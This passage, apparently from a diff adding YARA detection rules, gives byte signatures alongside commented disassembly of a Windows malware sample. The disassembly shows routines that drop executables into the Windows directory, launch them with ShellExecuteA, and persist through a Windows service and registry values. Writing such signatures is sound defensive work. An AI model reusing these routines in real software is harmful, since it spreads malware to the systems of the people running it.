.text:0x0040727d 754e jnz 0x004072cd + .text:0x0040727f 8b45f4 mov eax,dword [ebp - 12] + .text:0x00407282 40 inc eax + .text:0x00407283 3db80b0000 cmp eax,3000 + .text:0x00407288 8945f4 mov dword [ebp - 12],eax + .text:0x0040728b 72dd jc 0x0040726a + .text:0x0040728d 6a00 push 0 + .text:0x0040728f c745f400000000 mov dword [ebp - 12],0 + .text:0x00407296 c645dc6f mov byte [ebp - 36],111 + .text:0x0040729a c645dd70 mov byte [ebp - 35],112 + .text:0x0040729e c645de65 mov byte [ebp - 34],101 + .text:0x004072a2 c645df6e mov byte [ebp - 33],110 + .text:0x004072a6 c645e000 mov byte [ebp - 32],0 + .text:0x004072aa ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072ac 6a05 push 5 + .text:0x004072ae 6a00 push 0 + .text:0x004072b0 8d95b0fdffff lea edx,dword [ebp - 592] + .text:0x004072b6 6a00 push 0 + .text:0x004072b8 8d45dc lea eax,dword [ebp - 36] + .text:0x004072bb 52 push edx + .text:0x004072bc 50 push eax + .text:0x004072bd 6a00 push 0 + .text:0x004072bf ffd7 call edi ;shell32.ShellExecuteA(0,local40,local596,0,0,5) + .text:0x004072c1 6a00 push 0 + .text:0x004072c3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072c5 43 inc ebx + .text:0x004072c6 83fb03 cmp ebx,3 + .text:0x004072c9 7335 jnc 0x00407300 + .text:0x004072cb eb9d jmp 0x0040726a + .text:0x004072cd loc_004072cd: [1 XREFS] + .text:0x004072cd 6a00 push 0 + .text:0x004072cf ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072d1 803d60a5400001 cmp byte [0x0040a560],1 + .text:0x004072d8 7514 jnz 0x004072ee + .text:0x004072da 8d8db0fdffff lea ecx,dword [ebp - 592] + .text:0x004072e0 51 push ecx + .text:0x004072e1 6818a24000 push 0x0040a218 + .text:0x004072e6 e8f5e3ffff call 0x004056e0 ;sub_004056e0(0x0040a218,local596) + .text:0x004072eb 83c408 add esp,8 + .text:0x004072ee loc_004072ee: [1 XREFS] + .text:0x004072ee 6a00 push 0 + .text:0x004072f0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072f2 a15ca54000 mov eax,dword [0x0040a55c] + .text:0x004072f7 85c0 test eax,eax + .text:0x004072f9 7405 jz 0x00407300 + 
.text:0x004072fb e820e6ffff call 0x00405920 ;sub_00405920() + .text:0x00407300 loc_00407300: [2 XREFS] + .text:0x00407300 6a00 push 0 + .text:0x00407302 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407304 5f pop edi + .text:0x00407305 5e pop esi + .text:0x00407306 33c0 xor eax,eax + .text:0x00407308 5b pop ebx + .text:0x00407309 8be5 mov esp,ebp + .text:0x0040730b 5d pop ebp + .text:0x0040730c c21000 ret 16 + .text:0x0040730f loc_0040730f: [1 XREFS] + .text:0x0040730f 53 push ebx + .text:0x00407310 c645f425 mov byte [ebp - 12],37 + .text:0x00407314 c645f573 mov byte [ebp - 11],115 + .text:0x00407318 c645f600 mov byte [ebp - 10],0 + .text:0x0040731c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040731e 8d55f4 lea edx,dword [ebp - 12] + .text:0x00407321 6818a24000 push 0x0040a218 + .text:0x00407326 52 push edx + .text:0x00407327 6818a24000 push 0x0040a218 + .text:0x0040732c e88f0b0000 call 0x00407ec0 ;msvcrt.sprintf(0x0040a218,local16) + .text:0x00407331 83c40c add esp,12 + .text:0x00407334 53 push ebx + .text:0x00407335 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407337 53 push ebx + .text:0x00407338 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040733a 53 push ebx + .text:0x0040733b c645e443 mov byte [ebp - 28],67 + .text:0x0040733f c645e56f mov byte [ebp - 27],111 + .text:0x00407343 c645e66e mov byte [ebp - 26],110 + .text:0x00407347 c645e76e mov byte [ebp - 25],110 + .text:0x0040734b c645e865 mov byte [ebp - 24],101 + .text:0x0040734f c645e963 mov byte [ebp - 23],99 + .text:0x00407353 c645ea74 mov byte [ebp - 22],116 + .text:0x00407357 c645eb47 mov byte [ebp - 21],71 + .text:0x0040735b c645ec72 mov byte [ebp - 20],114 + .text:0x0040735f c645ed6f mov byte [ebp - 19],111 + .text:0x00407363 c645ee75 mov byte [ebp - 18],117 + .text:0x00407367 c645ef70 mov byte [ebp - 17],112 + .text:0x0040736b c645f000 mov byte [ebp - 16],0 + .text:0x0040736f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407371 53 push ebx + .text:0x00407372 ffd6 call esi ;kernel32.Sleep(0) + 
.text:0x00407374 53 push ebx + .text:0x00407375 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407377 53 push ebx + .text:0x00407378 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040737a 8d85acf8ffff lea eax,dword [ebp - 1876] + .text:0x00407380 6800040000 push 1024 + .text:0x00407385 8d4de4 lea ecx,dword [ebp - 28] + .text:0x00407388 50 push eax + .text:0x00407389 51 push ecx + .text:0x0040738a 6818a24000 push 0x0040a218 + .text:0x0040738f e8ccdbffff call 0x00404f60 ;sub_00404f60(0x0040a218,local32,local1880,1024) + .text:0x00407394 83c410 add esp,16 + .text:0x00407397 53 push ebx + .text:0x00407398 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739a 53 push ebx + .text:0x0040739b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739d 53 push ebx + .text:0x0040739e ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073a0 8d95acf8ffff lea edx,dword [ebp - 1876] + .text:0x004073a6 52 push edx + .text:0x004073a7 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(local1880) + .text:0x004073ad 85c0 test eax,eax + .text:0x004073af 751f jnz 0x004073d0 + .text:0x004073b1 53 push ebx + .text:0x004073b2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073b4 6892a44000 push 0x0040a492 + .text:0x004073b9 6818a24000 push 0x0040a218 + .text:0x004073be e85dc1ffff call 0x00403520 ;sub_00403520(kernel32.Sleep(0),local1880,local32,0x0040a218,0x0040a492) + .text:0x004073c3 6818a24000 push 0x0040a218 + .text:0x004073c8 e883f2ffff call 0x00406650 ;sub_00406650(0x0040a218) + .text:0x004073cd 83c40c add esp,12 + .text:0x004073d0 loc_004073d0: [1 XREFS] + .text:0x004073d0 53 push ebx + .text:0x004073d1 66891d10ac4000 mov word [0x0040ac10],bx + .text:0x004073d8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073da e841f5ffff call 0x00406920 ;sub_00406920() + .text:0x004073df 5f pop edi + .text:0x004073e0 5e pop esi + .text:0x004073e1 33c0 xor eax,eax + .text:0x004073e3 5b pop ebx + .text:0x004073e4 8be5 mov esp,ebp + .text:0x004073e6 5d pop ebp + .text:0x004073e7 c21000 ret 16 + */ + $c30 = { 55 8B 
EC 81 EC 54 07 00 00 53 56 8B 35 ?? ?? ?? ?? 33 DB 57 53 FF D6 53 FF D6 90 90 90 90 90 90 90 90 90 53 FF D6 90 53 53 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 FF D6 90 FF 15 ?? ?? ?? ?? 53 FF D6 90 53 53 8D 45 ?? 53 50 FF 15 ?? ?? ?? ?? 53 FF D6 90 B9 FF 00 00 00 33 C0 8D BD ?? ?? ?? ?? 88 9D ?? ?? ?? ?? F3 AB 66 AB 68 54 03 00 00 68 18 A2 40 00 AA E8 ?? ?? ?? ?? 68 9A 01 00 00 68 78 A0 40 00 E8 ?? ?? ?? ?? 6A 01 E8 ?? ?? ?? ?? 83 C4 14 85 C0 74 ?? 53 FF D6 90 39 1D ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 53 FF D6 90 5F 5E 33 C0 5B 8B E5 5D C2 10 00 B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 F3 AB 66 AB 53 AA FF D6 8D 8D ?? ?? ?? ?? 68 04 01 00 00 51 68 FC A3 40 00 FF 15 ?? ?? ?? ?? 53 FF D6 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 FC A3 40 00 E8 ?? ?? ?? ?? 53 FF D6 8B 0D ?? ?? ?? ?? 68 FC A3 40 00 E8 ?? ?? ?? ?? 80 B8 ?? ?? ?? ?? 5C 75 ?? 8B 0D ?? ?? ?? ?? 68 FC A3 40 00 E8 ?? ?? ?? ?? C6 80 ?? ?? ?? ?? 00 53 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 5C C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 FF D6 68 60 A4 40 00 8D 45 ?? 68 FC A3 40 00 50 68 D8 AA 40 00 E8 ?? ?? ?? ?? 83 C4 10 53 FF D6 8B 0D ?? ?? ?? ?? 68 E0 A0 40 00 68 34 AC 40 00 E8 ?? ?? ?? ?? 53 FF D6 39 1D ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? A0 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 F3 AB 66 AB 53 AA FF D6 8D 8D ?? ?? ?? ?? 68 04 01 00 00 51 53 FF 15 ?? ?? ?? ?? 53 FF D6 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 D8 AA 40 00 52 E8 ?? ?? ?? ?? 85 C0 75 ?? A0 ?? ?? ?? ?? 66 C7 05 ?? ?? ?? ?? 03 00 3C 02 75 ?? 53 FF D6 53 C7 45 ?? 18 A2 40 00 C7 45 ?? A0 6D 40 00 89 5D ?? 89 5D ?? FF D6 53 66 C7 05 ?? ?? ?? ?? 01 00 FF D6 90 68 F4 01 00 00 FF D6 53 FF D6 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 FF D7 53 FF D6 68 E8 03 00 00 FF D6 53 FF D6 8D 4D ?? 51 FF D7 53 FF D6 66 C7 05 ?? ?? ?? ?? 02 00 E8 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2 10 00 6A 00 89 5D ?? FF D6 B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 F3 AB 66 AB 6A 00 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 
5C C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 AA FF D6 68 60 A4 40 00 8D 55 ?? 68 FC A3 40 00 8D 85 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 68 92 A4 40 00 68 18 A2 40 00 E8 ?? ?? ?? ?? 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 1C 6A 00 FF D6 68 FC A2 40 00 68 7C A2 40 00 8D 8D ?? ?? ?? ?? 68 18 A2 40 00 51 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 10 6A 00 FF D6 68 60 A4 40 00 E8 ?? ?? ?? ?? 83 C4 04 85 C0 75 ?? 8B 45 ?? 40 3D B8 0B 00 00 89 45 ?? 72 ?? 6A 00 C7 45 ?? 00 00 00 00 C6 45 ?? 6F C6 45 ?? 70 C6 45 ?? 65 C6 45 ?? 6E C6 45 ?? 00 FF D6 6A 05 6A 00 8D 95 ?? ?? ?? ?? 6A 00 8D 45 ?? 52 50 6A 00 FF D7 6A 00 FF D6 43 83 FB 03 73 ?? EB ?? 6A 00 FF D6 80 3D ?? ?? ?? ?? 01 75 ?? 8D 8D ?? ?? ?? ?? 51 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 08 6A 00 FF D6 A1 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 6A 00 FF D6 5F 5E 33 C0 5B 8B E5 5D C2 10 00 53 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 FF D6 8D 55 ?? 68 18 A2 40 00 52 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 0C 53 FF D6 53 FF D6 53 C6 45 ?? 43 C6 45 ?? 6F C6 45 ?? 6E C6 45 ?? 6E C6 45 ?? 65 C6 45 ?? 63 C6 45 ?? 74 C6 45 ?? 47 C6 45 ?? 72 C6 45 ?? 6F C6 45 ?? 75 C6 45 ?? 70 C6 45 ?? 00 FF D6 53 FF D6 53 FF D6 53 FF D6 8D 85 ?? ?? ?? ?? 68 00 04 00 00 8D 4D ?? 50 51 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 10 53 FF D6 53 FF D6 53 FF D6 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF D6 68 92 A4 40 00 68 18 A2 40 00 E8 ?? ?? ?? ?? 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 0C 53 66 89 1D ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? 
5F 5E 33 C0 5B 8B E5 5D C2 10 00 } + /* +function at 0x00402950@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get common file path + .text:0x00402950 + .text:0x00402950 FUNC: int bfastcall_caller sub_00402950( int eax, int edx, int ecx, int arg3, ) [2 XREFS] + .text:0x00402950 + .text:0x00402950 Stack Variables: (offset from initial top of stack) + .text:0x00402950 4: int arg3 + .text:0x00402950 -4: int local4 + .text:0x00402950 -5: int local5 + .text:0x00402950 -6: int local6 + .text:0x00402950 -7: int local7 + .text:0x00402950 -8: int local8 + .text:0x00402950 -9: int local9 + .text:0x00402950 -10: int local10 + .text:0x00402950 -11: int local11 + .text:0x00402950 -12: int local12 + .text:0x00402950 + .text:0x00402950 83ec0c sub esp,12 + .text:0x00402953 56 push esi + .text:0x00402954 8b3578904000 mov esi,dword [0x00409078] + .text:0x0040295a 57 push edi + .text:0x0040295b b15c mov cl,92 + .text:0x0040295d b073 mov al,115 + .text:0x0040295f 6a00 push 0 + .text:0x00402961 884c240c mov byte [esp + 12],cl + .text:0x00402965 8844240d mov byte [esp + 13],al + .text:0x00402969 c644240e79 mov byte [esp + 14],121 + .text:0x0040296e 8844240f mov byte [esp + 15],al + .text:0x00402972 c644241074 mov byte [esp + 16],116 + .text:0x00402977 c644241165 mov byte [esp + 17],101 + .text:0x0040297c c64424126d mov byte [esp + 18],109 + .text:0x00402981 884c2413 mov byte [esp + 19],cl + .text:0x00402985 c644241400 mov byte [esp + 20],0 + .text:0x0040298a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040298c b941000000 mov ecx,65 + .text:0x00402991 33c0 xor eax,eax + .text:0x00402993 bfb8a84000 mov edi,0x0040a8b8 + .text:0x00402998 50 push eax + .text:0x00402999 f3ab rep: stosd + .text:0x0040299b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040299d 6804010000 push 260 + .text:0x004029a2 68b8a84000 push 0x0040a8b8 + .text:0x004029a7 ff15b8904000 call dword [0x004090b8] ;kernel32.GetWindowsDirectoryA(0x0040a8b8,260) + .text:0x004029ad 6a00 push 0 + .text:0x004029af ffd6 call esi 
;kernel32.Sleep(0) + .text:0x004029b1 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004029b7 8d442408 lea eax,dword [esp + 8] + .text:0x004029bb 50 push eax + .text:0x004029bc 68b8a84000 push 0x0040a8b8 + .text:0x004029c1 e8ea1c0000 call 0x004046b0 ;sub_004046b0(0x0040a8b8,local12) + .text:0x004029c6 8b4c2418 mov ecx,dword [esp + 24] + .text:0x004029ca 51 push ecx + .text:0x004029cb 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004029d1 68b8a84000 push 0x0040a8b8 + .text:0x004029d6 e8d51c0000 call 0x004046b0 ;sub_004046b0(0x0040a8b8,arg3) + .text:0x004029db 5f pop edi + .text:0x004029dc 5e pop esi + .text:0x004029dd 83c40c add esp,12 + .text:0x004029e0 c3 ret + */ + $c31 = { 83 EC 0C 56 8B 35 ?? ?? ?? ?? 57 B1 5C B0 73 6A 00 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 79 88 44 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 65 C6 44 24 ?? 6D 88 4C 24 ?? C6 44 24 ?? 00 FF D6 B9 41 00 00 00 33 C0 BF B8 A8 40 00 50 F3 AB FF D6 68 04 01 00 00 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 8D 44 24 ?? 50 68 B8 A8 40 00 E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 8B 0D ?? ?? ?? ?? 68 B8 A8 40 00 E8 ?? ?? ?? ?? 
5F 5E 83 C4 0C C3 } + /* +function at 0x00403a40@9324d1a8ae37a36ae560c37448c9705a with 3 features: + - check if file exists + - get common file path + - write file on Windows + .text:0x00403a40 + .text:0x00403a40 FUNC: int stdcall sub_00403a40( int arg0, int arg1, int arg2, ) [4 XREFS] + .text:0x00403a40 + .text:0x00403a40 Stack Variables: (offset from initial top of stack) + .text:0x00403a40 12: int arg2 + .text:0x00403a40 8: int arg1 + .text:0x00403a40 4: int arg0 + .text:0x00403a40 -260: int local260 + .text:0x00403a40 -312: int local312 + .text:0x00403a40 -316: int local316 + .text:0x00403a40 -319: int local319 + .text:0x00403a40 -320: int local320 + .text:0x00403a40 -321: int local321 + .text:0x00403a40 -322: int local322 + .text:0x00403a40 -323: int local323 + .text:0x00403a40 -324: int local324 + .text:0x00403a40 -325: int local325 + .text:0x00403a40 -326: int local326 + .text:0x00403a40 -327: int local327 + .text:0x00403a40 -328: int local328 + .text:0x00403a40 -332: int local332 + .text:0x00403a40 -333: int local333 + .text:0x00403a40 -334: int local334 + .text:0x00403a40 -335: int local335 + .text:0x00403a40 -336: int local336 + .text:0x00403a40 + .text:0x00403a40 81ec50010000 sub esp,336 + .text:0x00403a46 56 push esi + .text:0x00403a47 8b3578904000 mov esi,dword [0x00409078] + .text:0x00403a4d 57 push edi + .text:0x00403a4e 6a00 push 0 + .text:0x00403a50 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403a52 8d442454 lea eax,dword [esp + 84] + .text:0x00403a56 6804010000 push 260 + .text:0x00403a5b 50 push eax + .text:0x00403a5c ff15b8904000 call dword [0x004090b8] ;kernel32.GetWindowsDirectoryA(local260,260) + .text:0x00403a62 b045 mov al,69 + .text:0x00403a64 6a00 push 0 + .text:0x00403a66 c64424145c mov byte [esp + 20],92 + .text:0x00403a6b c644241552 mov byte [esp + 21],82 + .text:0x00403a70 c644241675 mov byte [esp + 22],117 + .text:0x00403a75 c644241725 mov byte [esp + 23],37 + .text:0x00403a7a c644241864 mov byte [esp + 24],100 + .text:0x00403a7f 
c64424192e mov byte [esp + 25],46 + .text:0x00403a84 8844241a mov byte [esp + 26],al + .text:0x00403a88 c644241b58 mov byte [esp + 27],88 + .text:0x00403a8d 8844241c mov byte [esp + 28],al + .text:0x00403a91 c644241d00 mov byte [esp + 29],0 + .text:0x00403a96 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403a98 ff15d0904000 call dword [0x004090d0] ;kernel32.GetTickCount() + .text:0x00403a9e 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00403aa2 50 push eax + .text:0x00403aa3 8d542424 lea edx,dword [esp + 36] + .text:0x00403aa7 51 push ecx + .text:0x00403aa8 52 push edx + .text:0x00403aa9 ff15d8914000 call dword [0x004091d8] ;user32.wsprintfA(local312,local328) + .text:0x00403aaf 83c40c add esp,12 + .text:0x00403ab2 6a00 push 0 + .text:0x00403ab4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403ab6 8d442420 lea eax,dword [esp + 32] + .text:0x00403aba 8d4c2454 lea ecx,dword [esp + 84] + .text:0x00403abe 50 push eax + .text:0x00403abf 51 push ecx + .text:0x00403ac0 ff15cc904000 call dword [0x004090cc] ;kernel32.lstrcatA(local260,local312) + .text:0x00403ac6 6a00 push 0 + .text:0x00403ac8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403aca 6a00 push 0 + .text:0x00403acc 6880000000 push 128 + .text:0x00403ad1 6a02 push 2 + .text:0x00403ad3 6a00 push 0 + .text:0x00403ad5 6a02 push 2 + .text:0x00403ad7 8d542468 lea edx,dword [esp + 104] + .text:0x00403adb 6800000040 push 0x40000000 + .text:0x00403ae0 52 push edx + .text:0x00403ae1 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(local260,0x40000000,2,0,2,128,0) + .text:0x00403ae7 6a00 push 0 + .text:0x00403ae9 8bf8 mov edi,eax + .text:0x00403aeb ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403aed 83ffff cmp edi,0xffffffff + .text:0x00403af0 0f849a000000 jz 0x00403b90 + .text:0x00403af6 6a00 push 0 + .text:0x00403af8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403afa 8b8c2460010000 mov ecx,dword [esp + 352] + .text:0x00403b01 8b94245c010000 mov edx,dword [esp + 348] + .text:0x00403b08 8d44241c lea eax,dword [esp + 
28] + .text:0x00403b0c 6a00 push 0 + .text:0x00403b0e 50 push eax + .text:0x00403b0f 51 push ecx + .text:0x00403b10 52 push edx + .text:0x00403b11 57 push edi + .text:0x00403b12 ff15a4904000 call dword [0x004090a4] ;kernel32.WriteFile(kernel32.CreateFileA(local260,0x40000000,2,0,2,128,0),arg0,arg1,local316,0) + .text:0x00403b18 6a00 push 0 + .text:0x00403b1a ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b1c 57 push edi + .text:0x00403b1d ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00403ae1>) + .text:0x00403b23 83bc246401000002 cmp dword [esp + 356],2 + .text:0x00403b2b 7463 jz 0x00403b90 + .text:0x00403b2d 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00403b33 8d442454 lea eax,dword [esp + 84] + .text:0x00403b37 6a2e push 46 + .text:0x00403b39 50 push eax + .text:0x00403b3a e8d10d0000 call 0x00404910 ;sub_00404910(local260,46) + .text:0x00403b3f 85c0 test eax,eax + .text:0x00403b41 744d jz 0x00403b90 + .text:0x00403b43 6a00 push 0 + .text:0x00403b45 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b47 8d4c2454 lea ecx,dword [esp + 84] + .text:0x00403b4b c64424086f mov byte [esp + 8],111 + .text:0x00403b50 51 push ecx + .text:0x00403b51 c644240d70 mov byte [esp + 13],112 + .text:0x00403b56 c644240e65 mov byte [esp + 14],101 + .text:0x00403b5b c644240f6e mov byte [esp + 15],110 + .text:0x00403b60 c644241000 mov byte [esp + 16],0 + .text:0x00403b65 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(local260) + .text:0x00403b6b 83f8ff cmp eax,0xffffffff + .text:0x00403b6e 7420 jz 0x00403b90 + .text:0x00403b70 6a00 push 0 + .text:0x00403b72 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b74 6a05 push 5 + .text:0x00403b76 6a00 push 0 + .text:0x00403b78 8d54245c lea edx,dword [esp + 92] + .text:0x00403b7c 6a00 push 0 + .text:0x00403b7e 8d442414 lea eax,dword [esp + 20] + .text:0x00403b82 52 push edx + .text:0x00403b83 50 push eax + .text:0x00403b84 6a00 push 0 + .text:0x00403b86 ff15ac914000 call dword [0x004091ac] 
;shell32.ShellExecuteA(0,local336,local260,0,0,5) + .text:0x00403b8c 6a00 push 0 + .text:0x00403b8e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b90 loc_00403b90: [4 XREFS] + .text:0x00403b90 5f pop edi + .text:0x00403b91 33c0 xor eax,eax + .text:0x00403b93 5e pop esi + .text:0x00403b94 81c450010000 add esp,336 + .text:0x00403b9a c20c00 ret 12 + */ + $c32 = { 81 EC 50 01 00 00 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 8D 44 24 ?? 68 04 01 00 00 50 FF 15 ?? ?? ?? ?? B0 45 6A 00 C6 44 24 ?? 5C C6 44 24 ?? 52 C6 44 24 ?? 75 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 2E 88 44 24 ?? C6 44 24 ?? 58 88 44 24 ?? C6 44 24 ?? 00 FF D6 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 52 FF 15 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 68 80 00 00 00 6A 02 6A 00 6A 02 8D 54 24 ?? 68 00 00 00 40 52 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 83 FF FF 0F 84 ?? ?? ?? ?? 6A 00 FF D6 8B 8C 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 6A 00 50 51 52 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 57 FF 15 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? 02 74 ?? 8B 0D ?? ?? ?? ?? 8D 44 24 ?? 6A 2E 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 8D 4C 24 ?? C6 44 24 ?? 6F 51 C6 44 24 ?? 70 C6 44 24 ?? 65 C6 44 24 ?? 6E C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? 6A 00 FF D6 6A 05 6A 00 8D 54 24 ?? 6A 00 8D 44 24 ?? 52 50 6A 00 FF 15 ?? ?? ?? ?? 
6A 00 FF D6 5F 33 C0 5E 81 C4 50 01 00 00 C2 0C 00 } + /* +function at 0x004073f0@9324d1a8ae37a36ae560c37448c9705a with 6 features: + - copy file + - create service + - modify service + - persist via Windows service + - set registry value + - start service + .text:0x004073f0 + .text:0x004073f0 FUNC: int cdecl sub_004073f0( int arg0, int arg1, int arg2, int arg3, ) [2 XREFS] + .text:0x004073f0 + .text:0x004073f0 Stack Variables: (offset from initial top of stack) + .text:0x004073f0 16: int arg3 + .text:0x004073f0 12: int arg2 + .text:0x004073f0 8: int arg1 + .text:0x004073f0 4: int arg0 + .text:0x004073f0 -8: int local8 + .text:0x004073f0 -20: int local20 + .text:0x004073f0 -288: int local288 + .text:0x004073f0 -548: int local548 + .text:0x004073f0 -552: int local552 + .text:0x004073f0 -811: int local811 + .text:0x004073f0 -812: int local812 + .text:0x004073f0 -816: int local816 + .text:0x004073f0 -820: int local820 + .text:0x004073f0 -822: int local822 + .text:0x004073f0 -823: int local823 + .text:0x004073f0 -824: int local824 + .text:0x004073f0 -828: int local828 + .text:0x004073f0 -830: int local830 + .text:0x004073f0 -831: int local831 + .text:0x004073f0 -832: int local832 + .text:0x004073f0 -833: int local833 + .text:0x004073f0 -834: int local834 + .text:0x004073f0 -835: int local835 + .text:0x004073f0 -836: int local836 + .text:0x004073f0 -837: int local837 + .text:0x004073f0 -838: int local838 + .text:0x004073f0 -839: int local839 + .text:0x004073f0 -840: int local840 + .text:0x004073f0 -841: int local841 + .text:0x004073f0 -842: int local842 + .text:0x004073f0 -843: int local843 + .text:0x004073f0 -844: int local844 + .text:0x004073f0 -845: int local845 + .text:0x004073f0 -846: int local846 + .text:0x004073f0 -847: int local847 + .text:0x004073f0 -848: int local848 + .text:0x004073f0 -849: int local849 + .text:0x004073f0 -850: int local850 + .text:0x004073f0 -851: int local851 + .text:0x004073f0 -852: int local852 + .text:0x004073f0 -853: int local853 + 
.text:0x004073f0 -854: int local854 + .text:0x004073f0 -855: int local855 + .text:0x004073f0 -856: int local856 + .text:0x004073f0 -857: int local857 + .text:0x004073f0 -858: int local858 + .text:0x004073f0 -859: int local859 + .text:0x004073f0 -860: int local860 + .text:0x004073f0 -861: int local861 + .text:0x004073f0 -862: int local862 + .text:0x004073f0 -863: int local863 + .text:0x004073f0 -864: int local864 + .text:0x004073f0 -868: int local868 + .text:0x004073f0 -869: int local869 + .text:0x004073f0 -870: int local870 + .text:0x004073f0 -871: int local871 + .text:0x004073f0 -872: int local872 + .text:0x004073f0 -873: int local873 + .text:0x004073f0 -874: int local874 + .text:0x004073f0 -875: int local875 + .text:0x004073f0 -876: int local876 + .text:0x004073f0 -877: int local877 + .text:0x004073f0 -878: int local878 + .text:0x004073f0 -879: int local879 + .text:0x004073f0 -880: int local880 + .text:0x004073f0 + .text:0x004073f0 55 push ebp + .text:0x004073f1 8bec mov ebp,esp + .text:0x004073f3 6aff push 0xffffffff + .text:0x004073f5 68b8924000 push 0x004092b8 + .text:0x004073fa 68907e4000 push 0x00407e90 + .text:0x004073ff 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00407405 50 push eax + .text:0x00407406 64892500000000 fs: mov dword [0x00000000],esp + .text:0x0040740d 81ec5c030000 sub esp,860 + .text:0x00407413 53 push ebx + .text:0x00407414 56 push esi + .text:0x00407415 57 push edi + .text:0x00407416 c685d8fcffff00 mov byte [ebp - 808],0 + .text:0x0040741d b940000000 mov ecx,64 + .text:0x00407422 33c0 xor eax,eax + .text:0x00407424 8dbdd9fcffff lea edi,dword [ebp - 807] + .text:0x0040742a f3ab rep: stosd + .text:0x0040742c 66ab stosd + .text:0x0040742e aa stosb + .text:0x0040742f 33db xor ebx,ebx + .text:0x00407431 53 push ebx + .text:0x00407432 8b3578904000 mov esi,dword [0x00409078] + .text:0x00407438 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040743a 6804010000 push 260 + .text:0x0040743f 8d85d8fcffff lea eax,dword [ebp - 808] + 
